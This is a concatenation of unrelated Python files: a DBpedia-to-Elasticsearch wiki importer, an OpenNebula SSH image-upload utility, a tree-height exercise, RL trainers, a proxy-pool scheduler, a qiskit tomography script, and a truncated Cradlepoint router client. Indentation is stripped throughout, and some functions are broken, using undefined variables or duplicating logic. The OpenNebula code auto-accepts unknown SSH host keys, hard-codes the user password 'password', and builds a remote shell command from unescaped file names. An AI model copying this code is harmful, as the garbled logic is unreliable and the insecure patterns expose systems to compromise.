with bz2.BZ2File(path, "rb") as f:
for i, l in enumerate(f):
if i % 10000 == 0:
print(i)
# if i > 10:
# break
ln = l.decode().strip()
if ln.startswith("#"):
continue
s, p, o, _ = ln.split(" ")
proc_one(s, p, o)
# title, redirect = pattern.findall(ln)[0]
# title = html.unescape(title)
# redirect = html.unescape(redirect)
# add dpid
def _proc(s, p, o):
u = UpdateByQuery(index='wiki-page').using(es)
# u = u.query("term", uid="21550")
u = u.query("term", uid=o)
u = u.script(
source="ctx._source.dpid=params.dpid",
params={"dpid": s},)
resp = u.execute()
scan_ttl(path, _proc)
# add redirect
def _proc(s, p, o):
u = UpdateByQuery(index='wiki-page').using(es)
# u = u.query("term", uid="21550")
u = u.query("term", uid=o)
u = u.script(
source="ctx._source.dpid=params.dpid",
params={"dpid": s},)
resp = u.execute()
scan_ttl(path, _proc)
def proc_uid(ln: str):
s, p, o, _ = ln.split(" ")
try:
_ = WikiPage.get(redirect)
except:
pass
try:
_ = WikiPage.get(redirect)
except elasticsearch.NotFoundError:
# print(f"Redirect page not found: {redirect}")
pass
try:
p = WikiPage.get(title)
except elasticsearch.NotFoundError:
p = WikiPage(title=title, redirect=redirect)
p.save()
else:
if p.title != redirect:
p.update(redirect=redirect)
def wkredirects_to_elastic(path_to_redirects_file: str):
print("Wiki-redirects to elastic start")
pattern = re.compile(
"<http://dbpedia.org/resource/(.*)> <http://dbpedia.org/ontology/wikiPageRedirects> <http://dbpedia.org/resource/(.*)> .")
with bz2.BZ2File(path_to_redirects_file, "rb") as f:
for i, l in enumerate(f):
if i % 10000 == 0:
print(i)
# if i > 10:
# break
ln = l.decode().strip()
if ln.startswith("#"):
continue
# try:
# title, redirect = pattern.findall(ln)[0]
# except Exception as e:
# print(e)
# print(ln)
title, redirect = pattern.findall(ln)[0]
title = html.unescape(title)
redirect = html.unescape(redirect)
try:
_ = WikiPage.get(redirect)
except elasticsearch.NotFoundError:
# print(f"Redirect page not found: {redirect}")
continue
try:
p = WikiPage.get(title)
except elasticsearch.NotFoundError:
p = WikiPage(title=title, redirect=redirect)
p.save()
else:
if p.title != redirect:
p.update(redirect=redirect)
print("Wiki-redirects to elastic finished")
def scan_scraper_page(url_filter: str, sorted: bool = False) -> Iterable[Document]:
es = connections.get_connection()
s = Search(using=es, index="scraper-page")
q = Q('wildcard', resolved_url=url_filter) & Q("term", http_status=200)
s = s.query(q)
if sorted:
s = s.sort('article_published_at')
s = s.params(preserve_order=True)
# resp = s.scan()
# print(resp.hits.total)
visited = set()
for i, hit in enumerate(s.scan()):
# if i > 100:
# break
if hit.resolved_url in visited:
continue
visited.add(hit.resolved_url)
yield hit
# ---------------
# Setup functions
# ---------------
def create_patterned_index(alias: str, pattern: str, create_alias: bool = True) -> None:
"""Run only one time to setup"""
name = pattern.replace(
'*', datetime.datetime.now().strftime('%Y%m%d%H%M'))
# create_index
es = connections.get_connection()
es.indices.create(index=name)
if create_alias:
es.indices.update_aliases(body={
'actions': [
{"remove": {"alias": alias, "index": pattern}},
{"add": {"alias": alias, "index": name}},
]
})
def migrate(src, dest):
es = connections.get_connection()
es.reindex(body={"source": {"index": src}, "dest": {"index": dest}})
es.indices.refresh(index=dest)
def connect(hosts: List[str]):
# c = connections.Connections()
# c.configure(default={"hosts": ["es.com"]}, local={"hosts": ["localhost"]})
# c.remove_connection("default")
connections.create_connection(hosts=hosts, timeout=20)
if __name__ == '__main__':
connect(['es:9200'])
# create_patterned_index(PAGE_ALIAS, PAGE_PATTERN)
# create_patterned_index(REDIRECT_ALIAS, REDIRECT_PATTERN)
# create_patterned_index(WKD_ALIAS, WKD_PATTERN)
# Import cirrusdump: require both content & general dump
# import_from_cirrusdump(
# "/workspace/entity_knowledge_in_bert/app/downloads/cirrus/enwiki-20200907-cirrussearch-content.json.gz",
# n_threads=20,
# first_n=100000,)
import_from_wkddump(
"/workspace/entity_knowledge_in_bert/app/downloads/latest-all.json.bz2",
first_n=10000,
)
# Deprecated
# wikiextracted_to_elastic("./downloads/wikiextracted")
# wkredirects_to_elastic("../downloads/redirects_lang=en.ttl.bz2")
|
opennebula_util.py
|
"""
Copyright 2019 Atos
Contact: Javier Melián <javimelian@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pyone
import functools
from multiprocessing import Process
import logging
#File transfer imports
from paramiko import SSHClient, AutoAddPolicy
from scp import SCPClient
# Logging Parameters
logger = logging.getLogger("ONE")
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
stream_formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
fh = logging.FileHandler('one.log')
fh.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(fh)
logger.addHandler(stream_handler)
def timeout(func):
"""
Wrapper for function, terminate after 5 seconds
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
action = Process(target=func, args=args, kwargs=kwargs)
action.start()
action.join(timeout=5)
if action.is_alive():
# terminate function
action.terminate()
# clean up
action.join()
raise (TimeoutError)
# if process is not 0, is not successful
if action.exitcode != 0:
# raise Attribute Error, which is the most probable
raise (AttributeError)
return (wrapper)
def ssh_transfer_files(ssh_host, ssh_user, ssh_password, source_volume, destination_volume, ssh_port=22):
import plumbum
import os.path
from os import path
try:
logger.debug("Source image file exists: "+str(path.exists(source_volume)))
remote = plumbum.SshMachine(str(ssh_host), user = ssh_user, password = ssh_password)
fro = plumbum.local.path(source_volume)
to = remote.path(destination_volume)
plumbum.path.utils.copy(fro, to)
logger.info("File transfered")
except Exception as e:
logger.exception("Failure while transfering the file to the server: {}".format(str(e)))
#remote.close()
def ssh_scp_files(ssh_host, ssh_user, ssh_password, source_volume, destination_volume, ssh_port=22):
"""
"""
import os
logger.info("Transfering file {} to the server".format(source_volume))
try:
ssh = SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(AutoAddPolicy())
ssh.connect(ssh_host, username=ssh_user, password=ssh_password, look_for_keys=False)
with SCPClient(ssh.get_transport()) as scp:
scp.put(source_volume, recursive=True, remote_path=destination_volume)
logger.info("File transfered")
#once transfered, convert the image from raw to qcow2
# Example: qemu-img convert -f raw -O qcow2 ttylinux-vd.qcow2 ttylinux-vd.qcow2
command = "qemu-img convert -f raw -O qcow2 {}{} {}{}".format(destination_volume, source_volume, destination_volume, os.path.splitext(source_volume)[0]+'.qcow2')
stdin, stdout, stderr = ssh.exec_command(command)
logger.info("File converted to qcow2 format")
except Exception as e:
logger.exception("Failure while transfering the file to the server: {}".format(str(e)))
ssh.close()
def delete_remote_file(ssh_host, ssh_user, ssh_password, path, ssh_port=22):
"""
"""
logger.info("Deleting cached file")
try:
ssh = SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(AutoAddPolicy())
ssh.connect(ssh_host, username=ssh_user, password=ssh_password, look_for_keys=False)
sftp = ssh.open_sftp()
logger.debug("path: {}".format(path))
sftp.remove(path)
logger.info("File deleted")
except Exception as e:
logger.exception("Failure while deleting cached file: {}".format(str(e)))
return "Failure while deleting cached file: {}".format(str(e)), 400
ssh.close()
return "OK", 204
class Opennebula():
"""
Class implementing the communication API with OpenNebula
"""
# Note: Cannot use conn as a self variable, as it is not possible to
# serialize it and store it in a db
def __init__(self, uuid, auth_url, project_name, username, password):
"""
Initialize an object of the class
"""
self.uuid = uuid
self.auth_url = auth_url
self.project_name = project_name
self.username = username
self.password = password
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(username, password)
)
def create_project(self, conn, name, description=""):
"""
Creates a new OpenNebula group
"""
group = conn.group.allocate(name, description)
# returns Project object
return group
def create_user(self, conn, name, password, group):
"""
Creates a new openstack project
"""
user = conn.user.allocate(name, password, "", [group])
return user
def create_sec_group(self, conn, name, project):
"""
Creates the security group to be assigned to the new tenant
"""
sec_group = conn.create_security_group(
name=name, description="Security Group",
project_id=project.id)
conn.create_security_group_rule(sec_group)
return sec_group
def delete_user(self, conn, user_id):
"""
Deletes the user
"""
try:
return conn.user.delete(user_id)
except pyone.OneNoExistsException as e:
logger.exception("Failed. Trying to delete user: doesn't exist - ", user_id)
except Exception as e:
logger.exception("Failed. Trying to delete user: ", user_id)
def delete_user_by_name(self, conn, name):
"""
Deletes the user
"""
userpool = conn.userpool.info(-1, -1, -1)
for user in userpool.USER:
if user.get_NAME() == name:
return conn.user.delete(user.get_ID())
def delete_project(self, conn, group_id):
"""
Deletes the group
"""
try:
return conn.group.delete(group_id)
except pyone.OneNoExistsException as e:
logger.exception("Failed. Trying to delete group: doesn't exist - ", group_id)
except Exception as e:
logger.exception("Failed. Trying to delete group: ", group_id)
def delete_project_by_name(self, conn, name):
"""
Deletes the group
"""
grouppool = conn.grouppool.info(-1, -1, -1)
for group in grouppool.GROUP:
if group.get_NAME() == name:
return conn.group.delete(group.get_ID())
def delete_proj_user(self, user_id):
"""
Deletes user and project
"""
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(self.username, self.password)
)
try:
user = conn.user.info(user_id)
group = user.get_GROUPS().ID[0]
# delete group
conn.group.delete(group)
# delete user
return conn.user.delete(user.get_ID())
except pyone.OneNoExistsException as e:
logger.exception("Failed. User trying to delete, doesn't exist: ", user_id)
except Exception as e:
logger.exception("Failed. User trying to delete, group doesn't exist: ", user_id)
def delete_proj_user_by_name(self, name):
"""
Deletes user and project
"""
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(self.username, self.password)
)
userpool = conn.userpool.info(-1,-1,-1)
for user in userpool.USER:
if user.get_NAME() == name:
group = user.get_GROUPS()[0]
# delete group
conn.group.delete(group)
# delete user
return conn.user.delete(user.get_ID())
logger.warning("Delete user ONE: user does not exist: ", name)
def create_slice_prerequisites(self, tenant_project_name,
tenant_project_description,
tenant_project_user,
tenant_project_password,
slice_uuid):
"""
Creates the tenant (project, user, security_group) on the specified vim
"""
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(self.username, self.password)
)
# creates the project in OpenNebula
project = self.create_project(conn, tenant_project_name,
tenant_project_description)
# creates the user
user = self.create_user(conn, tenant_project_user, "password", project)
# creates the security group and rules
# sec_group = self.create_sec_group(conn, tenant_project_name, project)
sec_group = "dummy"
return {"sliceProjectName": project, "sliceUserName": user,
"secGroupName": sec_group}
def upload_image (auth_url, one_username, one_password, f, server_ip, server_username, server_password, image_dir, ssh_port=22, image_type = "OS"):
"""
Transfers the image file to the ONE server and registers it to the ONE
"""
import os
try:
ssh_scp_files(server_ip, server_username, server_password, f, image_dir, ssh_port)
#ssh_transfer_files(server_ip, server_username, server_password, f, image_dir, ssh_port)
# sife of the file in bytes
size = os.path.getsize(f)
# convert to MB
size = int(size/(1024*1024))
# Resgister the image
conn = pyone.OneServer(
auth_url,
session="{0}:{1}".format(one_username, one_password)
)
name, file_extension = os.path.splitext(f)
description = f
source = image_dir + f
# find the default datastore
dsid = 0
datastores = conn.datastorepool.info()
for ds in datastores.DATASTORE:
if ds.NAME == "default":
dsid = ds.ID
break
# creation of the image template and registration
#template='''\nNAME="%s"\nPATH="%s"\nTYPE="%s"\nDESCRIPTION="%s"\nSIZE="%d"''' % \
template='''\nNAME="%s"\nPATH="%s"\nTYPE="%s"\nDRIVER="qcow2"\nDESCRIPTION="%s"\nSIZE="%d"''' % \
(name, source, image_type, description, size*3)
logger.debug("template: {}".format(template))
logger.debug("DSID: {}".format(dsid))
r = conn.image.allocate(template,dsid)
except Exception as e:
logger.exception("Failed uploading image: {}".format(str(e)))
delete_remote_file(server_ip, server_username, server_password, str(image_dir + f), ssh_port)
return "Failed uploading image: {}".format(str(e)), 400
delete_remote_file(server_ip, server_username, server_password, str(image_dir + f), ssh_port)
return "Image uploaded successfully", 201
|
tree-height.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.parent = list(map(int, sys.stdin.readline().split()))
def compute_height(self):
# Replace this code with a faster implementation
maxHeight = 0
for vertex in range(self.n):
height = 0
i = vertex
while i != -1:
height += 1
i = self.parent[i]
maxHeight = max(maxHeight, height);
return maxHeight;
def main():
tree = TreeHeight()
tree.read()
print(tree.compute_height())
threading.Thread(target=main).start()
|
trainer.py
|
from collections import deque
import tensorflow as tf
import numpy as np
import copy
import time
import threading
import copy
class AgentInterface:
def act(self, state, reward, training):
raise NotImplementedError()
def stop_episode(state, reward, training):
raise NotImplementedError()
class Trainer:
def __init__(self,
env,
agent,
state_shape=[84, 84],
final_step=1e7,
state_window=1,
training=True,
render=False,
debug=True,
before_action=None,
after_action=None,
end_episode=None,
is_finished=None,
evaluator=None,
end_eval=None,
should_eval=lambda s, e: s % 10 ** 5 == 0):
self.env = env
self.final_step = final_step
self.init_states = deque(
np.zeros(
[state_window] + state_shape,
dtype=np.float32
).tolist(),
maxlen=state_window
)
self.agent = agent
self.training = training
self.render = render
self.debug = debug
self.before_action = before_action
self.after_action = after_action
self.end_episode = end_episode
self.is_finished = is_finished
self.evaluator = evaluator
self.end_eval = end_eval
self.should_eval = should_eval
# counters
self.global_step = 0
self.local_step = 0
self.episode = 0
self.sum_of_rewards = 0
self.pause = True
# for multithreading
self.resume_event = threading.Event()
self.resume_event.set()
def move_to_next(self, states, reward, done):
states = np.array(list(states))
# take next action
action = self.agent.act(
states,
reward,
self.training
)
state, reward, done, info = self.env.step(action)
# render environment
if self.render:
self.env.render()
return state, reward, done, info
def finish_episode(self, states, reward):
states = np.array(list(states))
self.agent.stop_episode(
states,
reward,
self.training
)
if self.debug:
self.print_info()
def start(self):
while True:
self.local_step = 0
self.sum_of_rewards = 0
reward = 0
done = False
state = self.env.reset()
states = copy.deepcopy(self.init_states)
while True:
# to stop trainer from outside
self.resume_event.wait()
states.append(state.tolist())
# episode reaches the end
if done:
self.episode += 1
self.end_episode_callback(
self.env.get_results()['rewards'],
self.global_step, self.episode)
self.finish_episode(states, reward)
break
self.before_action_callback(
states, self.global_step, self.local_step)
state, reward, done, info = self.move_to_next(
states, reward, done)
self.after_action_callback(
states, reward, self.global_step, self.local_step)
self.sum_of_rewards += reward
self.global_step += 1
self.local_step += 1
if self.evaluator is not None:
self.evaluate()
if self.is_training_finished():
return
def print_info(self):
print('step: {}, episode: {}, reward: {}'.format(
self.global_step,
self.episode,
self.env.get_results()['rewards']
))
def before_action_callback(self, states, global_step, local_step):
if self.before_action is not None:
self.before_action(
states,
global_step,
local_step
)
def after_action_callback(self, states, reward, global_step, local_step):
if self.after_action is not None:
self.after_action(
states,
reward,
global_step,
local_step
)
def end_episode_callback(self, reward, global_step, episode):
if self.end_episode is not None:
self.end_episode(
reward,
global_step,
episode
)
def is_training_finished(self):
if self.is_finished is not None:
return self.is_finished(self.global_step)
return self.global_step > self.final_step
def evaluate(self):
should_eval = self.should_eval(self.global_step, self.episode)
if should_eval:
print('evaluation starts')
agent = copy.copy(self.agent)
agent.stop_episode(copy.deepcopy(self.init_states), 0, False)
eval_rewards = self.evaluator.start(
agent, self.global_step, self.episode)
if self.end_eval is not None:
self.end_eval(self.global_step, self.episode, eval_rewards)
if self.debug:
msg = '[eval] step: {}, episode: {}, reward: {}'
print(msg.format(
self.global_step, self.episode, np.mean(eval_rewards)))
def stop(self):
self.resume_event.clear()
def resume(self):
self.resume_event.set()
class BatchTrainer(Trainer):
def __init__(self,
env, # BatchEnvWrapper
agent,
state_shape=[84, 84],
final_step=1e7,
state_window=1,
training=True,
render=False,
debug=True,
before_action=None,
after_action=None,
end_episode=None):
super().__init__(
env=env,
agent=agent,
state_shape=state_shape,
final_step=final_step,
state_window=state_window,
training=training,
render=render,
debug=debug,
before_action=before_action,
after_action=after_action,
end_episode=end_episode
)
# overwrite global_step
self.global_step = 0
# TODO: Remove this overwrite
def move_to_next(self, states, reward, done):
states = np.array(list(states))
# take next action
action = self.agent.act(
states,
reward,
done, # overwrite line this
self.training
)
state, reward, done, info = self.env.step(action)
# render environment
if self.render:
self.env.render()
return state, reward, done, info
# overwrite
def start(self):
while True:
# values for the number of n environment
n_envs = self.env.get_num_of_envs()
self.local_step = [0 for _ in range(n_envs)]
self.sum_of_rewards = [0 for _ in range(n_envs)]
rewards = [0 for _ in range(n_envs)]
dones = [False for _ in range(n_envs)]
states = self.env.reset()
queue_states = [copy.deepcopy(self.init_states) for _ in range(n_envs)]
while True:
for i, state in enumerate(states):
queue_states[i].append(state.tolist())
np_states = np.array(list(map(lambda s: list(s), queue_states)))
# episode reaches the end
if False not in dones:
self.finish_episode(np_states, rewards)
break
for i in range(n_envs):
self.before_action_callback(
states[i],
self.global_step,
self.local_step[i]
)
# backup episode status
prev_dones = dones
states, rewards, dones, infos = self.move_to_next(
np_states, rewards, prev_dones)
for i in range(n_envs):
self.after_action_callback(
states[i],
rewards[i],
self.global_step,
self.local_step[i]
)
# check ended episodes
for i in range(n_envs):
if not prev_dones[i] and dones[i]:
self.episode += 1
# callback at the end of episode
self.end_episode(
self.env.get_results()[i]['rewards'],
self.global_step,
self.episode
)
for i in range(n_envs):
self.sum_of_rewards[i] += rewards[i]
if not dones[i]:
self.global_step += 1
self.local_step[i] += 1
if self.is_training_finished():
return
# overwrite
def print_info(self):
for i in range(self.env.get_num_of_envs()):
print('step: {}, episode: {}, reward: {}'.format(
self.global_step,
self.episode + i + 1,
self.sum_of_rewards[i]
))
class AsyncTrainer:
def __init__(self,
envs,
agents,
state_shape=[84, 84],
final_step=1e7,
state_window=1,
training=True,
render=False,
debug=True,
before_action=None,
after_action=None,
end_episode=None,
n_threads=10,
evaluator=None,
end_eval=None,
should_eval=None):
# meta data shared by all threads
self.meta_data = {
'shared_step': 0,
'shared_episode': 0,
'last_eval_step': 0,
'last_eval_episode': 0
}
# inserted callbacks
def _before_action(state, global_step, local_step):
shared_step = self.meta_data['shared_step']
if before_action is not None:
before_action(state, shared_step, global_step, local_step)
def _after_action(state, reward, global_step, local_step):
self.meta_data['shared_step'] += 1
shared_step = self.meta_data['shared_step']
if after_action is not None:
after_action(state, reward, shared_step, global_step, local_step)
def _end_episode(i):
def func(reward, global_step, episode):
shared_step = self.meta_data['shared_step']
self.meta_data['shared_episode'] += 1
shared_episode = self.meta_data['shared_episode']
if debug:
msg = 'worker: {}, global_step: {}, local_step: {}, episode: {}, reward: {}'
print(msg.format(
i,
shared_step,
global_step,
shared_episode,
reward
))
if end_episode is not None:
end_episode(
reward,
shared_step,
global_step,
shared_episode,
episode
)
return func
def _end_eval(step, episode, rewards):
shared_step = self.meta_data['shared_step']
shared_episode = self.meta_data['shared_episode']
for trainer in self.trainers:
trainer.resume()
if debug:
msg = '[eval] step: {}, episode: {}, reward: {}'
print(msg.format(shared_step, shared_episode, np.mean(rewards)))
if end_eval is not None:
end_eval(shared_step, shared_episode, step, episode, rewards)
def _should_eval(step, episode):
shared_step = self.meta_data['shared_step']
shared_episode = self.meta_data['shared_episode']
last_eval_step = self.meta_data['last_eval_step']
last_eval_episode = self.meta_data['last_eval_episode']
if should_eval is not None:
is_eval = should_eval(
last_eval_step, last_eval_episode,
shared_step, shared_episode, step, episode)
if is_eval:
for trainer in self.trainers:
trainer.stop()
self.meta_data['last_eval_step'] = shared_step
self.meta_data['last_eval_episode'] = shared_episode
return is_eval
self.trainers = []
for i in range(n_threads):
env = envs[i]
agent = agents[i]
trainer = Trainer(
env=env,
agent=agent,
state_shape=state_shape,
final_step=final_step,
state_window=state_window,
training=training,
render=i == 0 and render,
debug=False,
before_action=_before_action,
after_action=_after_action,
end_episode=_end_episode(i),
is_finished=lambda s: self.meta_data['shared_step'] > final_step,
evaluator=evaluator if i == 0 else None,
should_eval=_should_eval if i == 0 else None,
end_eval=_end_eval if i == 0 else None
)
self.trainers.append(trainer)
def start(self):
sess = tf.get_default_session()
coord = tf.train.Coordinator()
# gym renderer is only available on the main thread
render_trainer = self.trainers.pop(0)
threads = []
for i in range(len(self.trainers)):
def run(index):
with sess.as_default():
self.trainers[index].start()
thread = threading.Thread(target=run, args=(i,))
thread.start()
threads.append(thread)
time.sleep(0.1)
render_trainer.start()
coord.join(threads)
|
scheduler.py
|
#!/usr/bin/env python
# coding=utf-8
import time
from multiprocessing import Process
from async_proxy_pool.config import SERVER_HOST, SERVER_PORT, SERVER_ACCESS_LOG
from async_proxy_pool.webapi_sanic import app
from async_proxy_pool.logger import logger
from .config import CRAWLER_RUN_CYCLE, VALIDATOR_RUN_CYCLE
from .crawler import crawler
from .validator import validator
class Scheduler:
@staticmethod
def api():
app.run(host=SERVER_HOST, port=SERVER_PORT, access_log=SERVER_ACCESS_LOG)
@staticmethod
def crawler_task(cycle=CRAWLER_RUN_CYCLE):
while True:
crawler.run()
time.sleep(cycle * 60)
@staticmethod
def validator_task(cycle=VALIDATOR_RUN_CYCLE):
while True:
validator.run()
time.sleep(cycle * 60)
def run(self):
try:
api_process = Process(target=Scheduler.api)
api_process.start()
crawler_process = Process(target=Scheduler.crawler_task)
crawler_process.start()
validator_process = Process(target=Scheduler.validator_task)
validator_process.start()
except KeyboardInterrupt as e:
logger.info("You have canceled all jobs")
|
compare_Walltoall_sgd.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_walltoall(num_layers, num_qubits):
n_walltoall = qtm.ansatz.calculate_n_walltoall(num_qubits)
thetas = np.ones(num_layers* 3 * num_qubits + num_layers*n_walltoall)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_alltoall: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Walltoall_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Walltoall_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
# Get |psi~> = U_target|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Walltoall_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writting ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1, 2, 3, 4, 5]
num_qubits = [2, 6]
t_walltoalls = []
for i in num_layers:
for j in num_qubits:
t_walltoalls.append(multiprocessing.Process(target = run_walltoall, args=(i, j)))
for t_walltoall in t_walltoalls:
t_walltoall.start()
for t_walltoall in t_walltoalls:
t_walltoall.join()
print("Done!")
|
csclient.py
|
"""
NCOS communication module for SDK applications.
Copyright (c) 2018 Cradlepoint, Inc. <www.cradlepoint.com>. All rights reserved.
This file contains confidential information of CradlePoint, Inc. and your use of
this file is subject to the CradlePoint Software License Agreement distributed with
this file. Unauthorized reproduction or distribution of this file is subject to civil and
criminal penalties.
"""
import json
import os
import re
import select
import socket
import threading
import logging.handlers
import signal
import sys
try:
import traceback
except ImportError:
traceback = None
class SdkCSException(Exception):
pass
class CSClient(object):
"""
The CSClient class is the NCOS SDK mechanism for communication between apps and the router tree/config store.
Instances of this class communicate with the router using either an explicit socket or with http method calls.
Apps running locally on the router use a socket on the router to send commands from the app to the router tree
and to receive data (JSON) from the router tree.
Apps running remotely use the requests library to send HTTP method calls to the router and to receive data from
the router tree. This allows one to use an IDE to run and debug the application on a the computer. Although,
there are limitations with respect to the device hardware access (i.e. serial, USB, etc.).
"""
END_OF_HEADER = b"\r\n\r\n"
STATUS_HEADER_RE = re.compile(b"status: \w*")
CONTENT_LENGTH_HEADER_RE = re.compile(b"content-length: \w*")
MAX_PACKET_SIZE = 8192
RECV_TIMEOUT = 2.0
_instances = {}
@classmethod
def is_initialized(cls):
return cls in cls._instances
def __new__(cls, *na, **kwna):
""" Singleton factory (with subclassing support) """
if not cls.is_initialized():
cls._instances[cls] = super().__new__(cls)
return cls._instances[cls]
def __init__(self, app_name, init=False):
self.app_name = app_name
handlers = [logging.StreamHandler()]
if sys.platform == 'linux2':
handlers.append(logging.handlers.SysLogHandler(address='/dev/log'))
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)s: %(message)s', datefmt='%b %d %H:%M:%S',
handlers=handlers)
self.logger = logging.getLogger(app_name)
if not init:
return
def get(self, base, query='', tree=0):
"""
Constructs and sends a get request to retrieve specified data from a device.
The behavior of this method is contextual:
- If the app is installed on (and executed from) a device, it directly queries the router tree to retrieve the
specified data.
- If the app running remotely from a computer it calls the HTTP GET method to retrieve the specified data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
tree: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
if sys.platform == 'linux2':
cmd = "get\n{}\n{}\n{}\n".format(base, query, tree)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the get to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.get(device_api, auth=self._get_auth(device_ip, username, password))
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def put(self, base, value='', query='', tree=0):
"""
Constructs and sends a put request to update or add specified data to the device router tree.
The behavior of this method is contextual:
- If the app is installed on(and executed from) a device, it directly updates or adds the specified data to
the router tree.
- If the app running remotely from a computer it calls the HTTP PUT method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
tree: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
value = json.dumps(value)
if sys.platform == 'linux2':
cmd = "put\n{}\n{}\n{}\n{}\n".format(base, query, tree, value)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the put to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.put(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def post(self, base, value='', query=''):
"""
Constructs and sends a post request to update or add specified data to the device router tree.
The behavior of this method is contextual:
- If the app is installed on(and executed from) a device, it directly updates or adds the specified data to
the router tree.
- If the app running remotely from a computer it calls the HTTP POST method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
value = json.dumps(value)
if sys.platform == 'linux2':
cmd = f"post\n{base}\n{query}\n{value}\n"
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the post to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.post(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def delete(self, base, query=''):
"""
Constructs and sends a delete request to delete specified data to the device router tree.
The behavior of this method is contextual:
- If the app is installed on(and executed from) a device, it directly deletes the specified data to
the router tree.
- If the app running remotely from a computer it calls the HTTP DELETE method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
query: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
if sys.platform == 'linux2':
cmd = "delete\n{}\n{}\n".format(base, query)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the delete to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.delete(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
